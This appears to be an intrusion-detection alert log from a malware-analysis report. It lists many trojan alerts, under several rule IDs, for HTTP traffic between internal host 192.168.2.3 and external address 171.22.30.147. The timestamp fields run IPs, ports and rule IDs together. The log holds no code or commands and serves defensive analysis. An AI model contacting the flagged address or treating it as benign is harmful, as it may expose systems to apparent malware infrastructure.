            Timestamp:192.168.2.3171.22.30.14749927802025381 01/05/23-08:53:18.426652
            SID:2025381
            Source Port:49927
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749772802025381 01/05/23-08:52:31.644906
            SID:2025381
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497932025483 01/05/23-08:52:39.250846
            SID:2025483
            Source Port:80
            Destination Port:49793
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749950802025381 01/05/23-08:53:24.624259
            SID:2025381
            Source Port:49950
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750015802024313 01/05/23-08:53:43.993137
            SID:2024313
            Source Port:50015
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749888802024313 01/05/23-08:53:06.392338
            SID:2024313
            Source Port:49888
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749700802025381 01/05/23-08:52:07.351938
            SID:2025381
            Source Port:49700
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749971802024313 01/05/23-08:53:32.299331
            SID:2024313
            Source Port:49971
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749977802024313 01/05/23-08:53:33.899852
            SID:2024313
            Source Port:49977
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749921802825766 01/05/23-08:53:16.794242
            SID:2825766
            Source Port:49921
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499632025483 01/05/23-08:53:30.225111
            SID:2025483
            Source Port:80
            Destination Port:49963
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498702025483 01/05/23-08:53:01.650644
            SID:2025483
            Source Port:80
            Destination Port:49870
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749971802024318 01/05/23-08:53:32.299331
            SID:2024318
            Source Port:49971
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500802025483 01/05/23-08:54:02.938266
            SID:2025483
            Source Port:80
            Destination Port:50080
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749743802825766 01/05/23-08:52:23.467755
            SID:2825766
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750077802825766 01/05/23-08:54:02.067623
            SID:2825766
            Source Port:50077
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749832802825766 01/05/23-08:52:49.809310
            SID:2825766
            Source Port:49832
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500022025483 01/05/23-08:53:40.584610
            SID:2025483
            Source Port:80
            Destination Port:50002
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499292025483 01/05/23-08:53:19.030233
            SID:2025483
            Source Port:80
            Destination Port:49929
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749937802021641 01/05/23-08:53:21.090422
            SID:2021641
            Source Port:49937
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750064802021641 01/05/23-08:53:58.597698
            SID:2021641
            Source Port:50064
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750034802025381 01/05/23-08:53:50.478539
            SID:2025381
            Source Port:50034
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749848802021641 01/05/23-08:52:55.640788
            SID:2021641
            Source Port:49848
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749759802021641 01/05/23-08:52:28.024665
            SID:2021641
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750008802825766 01/05/23-08:53:42.094852
            SID:2825766
            Source Port:50008
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749819802024318 01/05/23-08:52:46.293306
            SID:2024318
            Source Port:49819
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749819802024313 01/05/23-08:52:46.293306
            SID:2024313
            Source Port:49819
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750054802825766 01/05/23-08:53:55.890469
            SID:2825766
            Source Port:50054
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749779802021641 01/05/23-08:52:35.235559
            SID:2021641
            Source Port:49779
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498642025483 01/05/23-08:53:00.058616
            SID:2025483
            Source Port:80
            Destination Port:49864
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497062025483 01/05/23-08:52:09.863839
            SID:2025483
            Source Port:80
            Destination Port:49706
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749901802025381 01/05/23-08:53:11.357263
            SID:2025381
            Source Port:49901
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500462025483 01/05/23-08:53:53.824439
            SID:2025483
            Source Port:80
            Destination Port:50046
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750080802025381 01/05/23-08:54:02.852694
            SID:2025381
            Source Port:50080
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749997802024313 01/05/23-08:53:39.208772
            SID:2024313
            Source Port:49997
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749729802025381 01/05/23-08:52:19.554519
            SID:2025381
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749726802025381 01/05/23-08:52:18.702884
            SID:2025381
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749997802024318 01/05/23-08:53:39.208772
            SID:2024318
            Source Port:49997
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749858802825766 01/05/23-08:52:58.341182
            SID:2825766
            Source Port:49858
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749947802825766 01/05/23-08:53:23.814636
            SID:2825766
            Source Port:49947
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500302025483 01/05/23-08:53:49.463564
            SID:2025483
            Source Port:80
            Destination Port:50030
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749815802025381 01/05/23-08:52:45.213789
            SID:2025381
            Source Port:49815
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749766802825766 01/05/23-08:52:30.012463
            SID:2825766
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749855802825766 01/05/23-08:52:57.514506
            SID:2825766
            Source Port:49855
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749904802025381 01/05/23-08:53:12.139251
            SID:2025381
            Source Port:49904
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499572025483 01/05/23-08:53:26.847761
            SID:2025483
            Source Port:80
            Destination Port:49957
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749944802825766 01/05/23-08:53:23.021157
            SID:2825766
            Source Port:49944
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749907802025381 01/05/23-08:53:12.956728
            SID:2025381
            Source Port:49907
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499352025483 01/05/23-08:53:20.648559
            SID:2025483
            Source Port:80
            Destination Port:49935
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749902802024313 01/05/23-08:53:11.610501
            SID:2024313
            Source Port:49902
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749813802024313 01/05/23-08:52:44.686594
            SID:2024313
            Source Port:49813
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749816802024313 01/05/23-08:52:45.483412
            SID:2024313
            Source Port:49816
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750051802825766 01/05/23-08:53:55.100340
            SID:2825766
            Source Port:50051
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749818802025381 01/05/23-08:52:46.013246
            SID:2025381
            Source Port:49818
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749905802024318 01/05/23-08:53:12.409052
            SID:2024318
            Source Port:49905
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750035802024318 01/05/23-08:53:50.741604
            SID:2024318
            Source Port:50035
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749769802825766 01/05/23-08:52:30.825016
            SID:2825766
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499132025483 01/05/23-08:53:14.676236
            SID:2025483
            Source Port:80
            Destination Port:49913
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749724802024313 01/05/23-08:52:18.098497
            SID:2024313
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749905802024313 01/05/23-08:53:12.409052
            SID:2024313
            Source Port:49905
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750011802025381 01/05/23-08:53:42.925761
            SID:2025381
            Source Port:50011
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749753802021641 01/05/23-08:52:26.326305
            SID:2021641
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749727802024313 01/05/23-08:52:18.985108
            SID:2024313
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749813802024318 01/05/23-08:52:44.686594
            SID:2024318
            Source Port:49813
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750067802021641 01/05/23-08:53:59.373237
            SID:2021641
            Source Port:50067
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749724802024318 01/05/23-08:52:18.098497
            SID:2024318
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749902802024318 01/05/23-08:53:11.610501
            SID:2024318
            Source Port:49902
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749842802021641 01/05/23-08:52:54.011182
            SID:2021641
            Source Port:49842
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750038802024318 01/05/23-08:53:51.593310
            SID:2024318
            Source Port:50038
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749884802025381 01/05/23-08:53:05.293982
            SID:2025381
            Source Port:49884
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749973802025381 01/05/23-08:53:32.829653
            SID:2025381
            Source Port:49973
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750038802024313 01/05/23-08:53:51.593310
            SID:2024313
            Source Port:50038
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749931802021641 01/05/23-08:53:19.484274
            SID:2021641
            Source Port:49931
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500742025483 01/05/23-08:54:01.312985
            SID:2025483
            Source Port:80
            Destination Port:50074
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749795802025381 01/05/23-08:52:39.717554
            SID:2025381
            Source Port:49795
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749882802024318 01/05/23-08:53:04.789158
            SID:2024318
            Source Port:49882
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749793802024318 01/05/23-08:52:39.171445
            SID:2024318
            Source Port:49793
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749882802024313 01/05/23-08:53:04.789158
            SID:2024313
            Source Port:49882
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500522025483 01/05/23-08:53:55.452652
            SID:2025483
            Source Port:80
            Destination Port:50052
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749793802024313 01/05/23-08:52:39.171445
            SID:2024313
            Source Port:49793
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749870802024313 01/05/23-08:53:01.561418
            SID:2024313
            Source Port:49870
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749853802025381 01/05/23-08:52:56.960046
            SID:2025381
            Source Port:49853
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749965802024313 01/05/23-08:53:30.671447
            SID:2024313
            Source Port:49965
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749766802021641 01/05/23-08:52:30.012463
            SID:2021641
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749904802024313 01/05/23-08:53:12.139251
            SID:2024313
            Source Port:49904
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749948802025381 01/05/23-08:53:24.079081
            SID:2025381
            Source Port:49948
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749965802024318 01/05/23-08:53:30.671447
            SID:2024318
            Source Port:49965
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500612025483 01/05/23-08:53:57.906111
            SID:2025483
            Source Port:80
            Destination Port:50061
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498112025483 01/05/23-08:52:44.228358
            SID:2025483
            Source Port:80
            Destination Port:49811
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498522025483 01/05/23-08:52:56.790001
            SID:2025483
            Source Port:80
            Destination Port:49852
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500202025483 01/05/23-08:53:45.721042
            SID:2025483
            Source Port:80
            Destination Port:50020
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749798802825766 01/05/23-08:52:40.547899
            SID:2825766
            Source Port:49798
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749870802024318 01/05/23-08:53:01.561418
            SID:2024318
            Source Port:49870
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499482025483 01/05/23-08:53:24.163130
            SID:2025483
            Source Port:80
            Destination Port:49948
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749738802021641 01/05/23-08:52:22.066688
            SID:2021641
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750066802021641 01/05/23-08:53:59.096230
            SID:2021641
            Source Port:50066
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750005802021641 01/05/23-08:53:41.297546
            SID:2021641
            Source Port:50005
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499072025483 01/05/23-08:53:13.039053
            SID:2025483
            Source Port:80
            Destination Port:49907
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749993802024318 01/05/23-08:53:38.145026
            SID:2024318
            Source Port:49993
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750065802825766 01/05/23-08:53:58.843527
            SID:2825766
            Source Port:50065
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749791802025381 01/05/23-08:52:38.617554
            SID:2025381
            Source Port:49791
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749730802025381 01/05/23-08:52:19.853027
            SID:2025381
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498932025483 01/05/23-08:53:07.831808
            SID:2025483
            Source Port:80
            Destination Port:49893
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749932802024313 01/05/23-08:53:19.762349
            SID:2024313
            Source Port:49932
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749993802024313 01/05/23-08:53:38.145026
            SID:2024313
            Source Port:49993
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750004802825766 01/05/23-08:53:41.033557
            SID:2825766
            Source Port:50004
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750061802021641 01/05/23-08:53:57.824423
            SID:2021641
            Source Port:50061
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749886802025381 01/05/23-08:53:05.845633
            SID:2025381
            Source Port:49886
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749937802024313 01/05/23-08:53:21.090422
            SID:2024313
            Source Port:49937
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749737802825766 01/05/23-08:52:21.818381
            SID:2825766
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749932802024318 01/05/23-08:53:19.762349
            SID:2024318
            Source Port:49932
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749733802021641 01/05/23-08:52:20.679095
            SID:2021641
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749889802021641 01/05/23-08:53:06.674333
            SID:2021641
            Source Port:49889
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749709802825766 01/05/23-08:52:11.256691
            SID:2825766
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750037802825766 01/05/23-08:53:51.314352
            SID:2825766
            Source Port:50037
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749793802825766 01/05/23-08:52:39.171445
            SID:2825766
            Source Port:49793
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750060802825766 01/05/23-08:53:57.543966
            SID:2825766
            Source Port:50060
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750000802021641 01/05/23-08:53:39.996140
            SID:2021641
            Source Port:50000
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749732802825766 01/05/23-08:52:20.401546
            SID:2825766
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749976802025381 01/05/23-08:53:33.629058
            SID:2025381
            Source Port:49976
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749881802025381 01/05/23-08:53:04.500331
            SID:2025381
            Source Port:49881
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749998802024318 01/05/23-08:53:39.461942
            SID:2024318
            Source Port:49998
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749827802825766 01/05/23-08:52:48.461129
            SID:2825766
            Source Port:49827
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749814802024313 01/05/23-08:52:44.953030
            SID:2024313
            Source Port:49814
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749998802024313 01/05/23-08:53:39.461942
            SID:2024313
            Source Port:49998
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749856802021641 01/05/23-08:52:57.793570
            SID:2021641
            Source Port:49856
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749704802825766 01/05/23-08:52:08.934535
            SID:2825766
            Source Port:49704
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749763802025381 01/05/23-08:52:29.176849
            SID:2025381
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749909802024318 01/05/23-08:53:13.489642
            SID:2024318
            Source Port:49909
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749858802025381 01/05/23-08:52:58.341182
            SID:2025381
            Source Port:49858
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749909802024313 01/05/23-08:53:13.489642
            SID:2024313
            Source Port:49909
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750032802825766 01/05/23-08:53:49.938594
            SID:2825766
            Source Port:50032
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749904802024318 01/05/23-08:53:12.139251
            SID:2024318
            Source Port:49904
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749761802021641 01/05/23-08:52:28.591148
            SID:2021641
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500502025483 01/05/23-08:53:54.876977
            SID:2025483
            Source Port:80
            Destination Port:50050
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499592025483 01/05/23-08:53:28.156512
            SID:2025483
            Source Port:80
            Destination Port:49959
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749847802024313 01/05/23-08:52:55.372015
            SID:2024313
            Source Port:49847
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500312025483 01/05/23-08:53:49.742875
            SID:2025483
            Source Port:80
            Destination Port:50031
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749884802021641 01/05/23-08:53:05.293982
            SID:2021641
            Source Port:49884
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749796802025381 01/05/23-08:52:39.986568
            SID:2025381
            Source Port:49796
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500722025483 01/05/23-08:54:00.772320
            SID:2025483
            Source Port:80
            Destination Port:50072
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749875802024318 01/05/23-08:53:02.907470
            SID:2024318
            Source Port:49875
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749814802024318 01/05/23-08:52:44.953030
            SID:2024318
            Source Port:49814
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749875802024313 01/05/23-08:53:02.907470
            SID:2024313
            Source Port:49875
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499372025483 01/05/23-08:53:21.171934
            SID:2025483
            Source Port:80
            Destination Port:49937
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497092025483 01/05/23-08:52:11.338117
            SID:2025483
            Source Port:80
            Destination Port:49709
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749842802024313 01/05/23-08:52:54.011182
            SID:2024313
            Source Port:49842
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750038802021641 01/05/23-08:53:51.593310
            SID:2021641
            Source Port:50038
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749825802025381 01/05/23-08:52:47.903129
            SID:2025381
            Source Port:49825
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749842802024318 01/05/23-08:52:54.011182
            SID:2024318
            Source Port:49842
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749700802021641 01/05/23-08:52:07.351938
            SID:2021641
            Source Port:49700
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749760802825766 01/05/23-08:52:28.304789
            SID:2825766
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749820802025381 01/05/23-08:52:46.558490
            SID:2025381
            Source Port:49820
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749847802024318 01/05/23-08:52:55.372015
            SID:2024318
            Source Port:49847
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499782025483 01/05/23-08:53:34.236429
            SID:2025483
            Source Port:80
            Destination Port:49978
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750033802021641 01/05/23-08:53:50.199257
            SID:2021641
            Source Port:50033
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749978802825766 01/05/23-08:53:34.155329
            SID:2825766
            Source Port:49978
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499892025483 01/05/23-08:53:37.188693
            SID:2025483
            Source Port:80
            Destination Port:49989
            Protocol:TCP
            Classtype:A Network Trojan was detected
